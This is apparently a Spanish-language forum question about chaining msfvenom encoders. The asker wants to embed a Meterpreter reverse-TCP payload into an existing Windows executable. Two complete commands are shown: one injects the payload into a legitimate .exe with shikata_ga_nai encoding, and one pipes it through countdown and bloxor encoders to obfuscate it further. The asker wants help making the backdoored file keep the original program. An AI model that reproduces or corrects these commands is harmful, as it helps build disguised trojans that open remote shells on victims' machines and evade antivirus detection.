Estoy intentando la codificación múltiple en el mismo archivo ejecutable, pero confuso con la sintaxis.
El problema:
Para codificar cualquier archivo ejecutable podemos usar la sintaxis:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X
LPORT=XXXX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe
Ahora, quiero codificar otro archivo ejecutable / mismo archivo; varias veces usando diferentes codificadores.
Sintaxis que estoy usando:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe
Encontré este subproceso y luego implementé la sintaxis anterior. Pero el archivo de salida que está generando no tiene el archivo ejecutable incluido. Como el tamaño de salida de la primera sintaxis es de 19 MB y de la segunda sintaxis es de 76 kB.
Por lo tanto, mi pregunta es cómo puedo implementar la codificación múltiple en el mismo archivo ejecutable.